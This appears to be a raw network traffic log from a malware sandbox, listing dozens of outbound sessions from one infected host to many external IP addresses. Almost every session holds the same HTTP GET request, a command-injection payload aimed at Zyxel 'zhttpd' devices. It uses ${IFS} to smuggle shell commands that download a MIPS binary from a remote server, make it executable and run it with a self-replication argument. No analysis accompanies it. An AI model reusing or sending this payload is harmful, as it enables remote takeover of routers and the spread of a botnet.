                                                994192.168.2.233862284.144.202.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605067968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                995192.168.2.2351480147.149.238.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605103016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                996192.168.2.2351134167.146.110.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605144978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                997192.168.2.2335834182.169.68.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605191946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                998192.168.2.2339094203.241.55.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605230093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                999192.168.2.2334472194.96.48.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605247974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1000192.168.2.235341665.137.81.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605273008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1001192.168.2.234998244.202.165.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605345011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1002192.168.2.234707049.222.100.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605355978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1003192.168.2.2360584118.18.90.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605381012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1004192.168.2.2334926169.84.235.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605398893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1005192.168.2.23557449.98.222.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605432034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1006192.168.2.23458621.157.131.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605473995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1007192.168.2.233323061.8.176.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605494976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1008192.168.2.2337886100.227.177.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605520010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1009192.168.2.2359968218.60.10.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605552912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1010192.168.2.2341122125.149.217.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605586052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1011192.168.2.23515142.226.92.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605606079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1012192.168.2.2346754170.200.222.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605643034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1013192.168.2.236030686.254.244.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605688095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1014192.168.2.2352104187.41.111.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605722904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1015192.168.2.2351374134.100.61.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605752945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1016192.168.2.2347776116.72.173.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605787992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1017192.168.2.2358234111.171.26.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605812073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1018192.168.2.2341010174.223.96.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605837107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1019192.168.2.234946047.210.219.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605856895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1020192.168.2.2358700115.220.68.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605901957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1021192.168.2.235586482.89.3.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605942011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1022192.168.2.2344928124.181.38.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605963945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1023192.168.2.2345238141.5.16.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605967999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1024192.168.2.2335048120.31.158.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.605993032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1025192.168.2.2353240129.240.245.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.606029034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1026192.168.2.2356188166.68.17.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615001917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1027192.168.2.2358372166.245.192.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615020990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1028192.168.2.23447089.73.102.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615046978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1029192.168.2.234755818.31.200.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615072012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1030192.168.2.2345900196.222.115.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615086079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1031192.168.2.2348588202.171.238.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615109921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1032192.168.2.2351892101.71.109.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615144968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1033192.168.2.234707491.161.62.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615149021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1034192.168.2.2354458143.79.123.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615202904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1035192.168.2.235326494.240.244.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615226030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1036192.168.2.2339802147.61.29.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615238905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1037192.168.2.2341188132.151.53.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615272999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1038192.168.2.23535742.224.237.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615288973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1039192.168.2.2349064196.116.180.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615335941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1040192.168.2.233722078.23.176.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615361929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1041192.168.2.235328474.187.222.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615375996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1042192.168.2.233744890.159.234.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615379095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1043192.168.2.2350362180.104.107.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615420103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1044192.168.2.233987866.37.243.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615467072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1045192.168.2.2344534150.225.175.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615468025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1046192.168.2.235845657.214.69.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615488052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1047192.168.2.236013644.27.39.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615523100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1048192.168.2.234656678.210.139.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615550995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1049192.168.2.2344930138.40.245.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615592003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1050192.168.2.2356440138.149.148.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615617990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1051192.168.2.2347018193.218.51.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615824938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1052192.168.2.233467689.52.250.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615844011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1053192.168.2.233567097.200.203.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615864038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1054192.168.2.2339160222.127.142.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615910053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1055192.168.2.2352930201.242.126.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615938902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1056192.168.2.233509457.93.84.86443
                                                TimestampBytes transferredDirectionData
